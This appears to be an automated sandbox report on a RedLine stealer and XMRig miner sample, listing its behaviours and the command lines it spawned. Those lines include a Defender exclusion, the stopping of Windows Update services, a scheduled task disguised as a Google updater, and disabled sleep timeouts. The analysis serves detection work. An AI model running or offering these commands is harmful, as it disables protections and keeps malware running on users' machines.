Malware Analysis Report

2025-01-18 09:03

Sample ID 230811-agg9gahg23
Target 2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp
SHA256 e1ba9b1567985575021e7c3acff4044e6d17164d32391c848fe8290e40249607
Tags
logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e1ba9b1567985575021e7c3acff4044e6d17164d32391c848fe8290e40249607

Threat Level: Known bad

The file 2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida xmrig miner

xmrig

Redline family

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Modifies system certificate store

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-11 00:10

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-11 00:10

Reported

2023-08-11 00:13

Platform

win7-20230712-en

Max time kernel

58s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1768 created 1352 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1076 set thread context of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3008 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3008 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3008 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3008 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3008 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3008 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3008 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3008 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3064 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3064 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3064 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3064 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1076 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3008 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3008 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3008 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3008 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1076 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1076 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1076 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1076 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 1544 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 1544 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 1544 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 108

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=54984 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef5c49758,0x7fef5c49768,0x7fef5c49778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=800 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1216 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=54984 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1588 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1916 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2456 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2008 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2684 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2788 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

